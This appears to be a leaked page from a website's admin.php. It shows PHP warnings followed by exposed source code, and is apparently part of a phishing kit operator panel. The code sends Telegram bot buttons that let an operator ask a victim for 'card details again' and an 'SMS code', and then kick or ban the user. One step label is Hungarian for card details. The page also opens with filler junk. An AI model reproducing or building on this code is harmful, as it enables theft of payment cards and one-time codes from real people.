???
123123123123
.....................................................................................................................................???
123123123123
.....................................................................................................................................
Warning: Undefined variable $auth in /home/elquintoelemento/public_html/admin.php on line 546
Warning: Trying to access array offset on null in /home/elquintoelemento/public_html/admin.php on line 546
Warning: Cannot modify header information - headers already sent by (output started at /home/elquintoelemento/public_html/admin.php:1) in /home/elquintoelemento/public_html/admin.php on line 188
Warning: Cannot modify header information - headers already sent by (output started at /home/elquintoelemento/public_html/admin.php:1) in /home/elquintoelemento/public_html/admin.php on line 189
array(
array(
array('text' => '💳 Card details again', 'callback_data' => $_SESSION['unique_id'] . ' ask_card'),
),
array(
array('text' => '📲 Ask SMS code', 'callback_data' => $_SESSION['unique_id'] . ' ask_sms'),
),
array(
array('text' => '✅ Complete', 'callback_data' => $_SESSION['unique_id'] . ' finish'),
),
array(
array('text' => '❕KICK USER❕', 'callback_data' => $_SESSION['unique_id'] . ' kick_user'),
array('text' => '❗BAN USER❗', 'callback_data' => $_SESSION['unique_id'] . ' ban_user'),
),
)
);
$activity['status'] = '🟢';
$activity['step'] = '*️⃣ Action: Please choose a command';
include(__DIR__ . '/../includes/php/texts.php');
$status = bot_api('editMessageText', $message, $buttons);
if ($status['ok'] === 0 || $status['ok'] === false) {
die('{"error":true, "description": "telegram bot api"}');
}
bot_reply('🔔 Card Updated');
header('location: process.php?for=details');
exit();
}
}else{
$buttons = array(
'inline_keyboard' => array(
array(
array('text' => '❕KICK USER❕', 'callback_data' => $_SESSION['unique_id'] . ' kick_user'),
array('text' => '❗BAN USER❗', 'callback_data' => $_SESSION['unique_id'] . ' ban_user'),
),
)
);
$activity['status'] = '🟢';
$activity['step'] = '#️⃣ Step: Kártya adatai';
include(__DIR__ . '/../includes/php/texts.php');
bot_api('editMessageText', $message, $buttons);
}
?>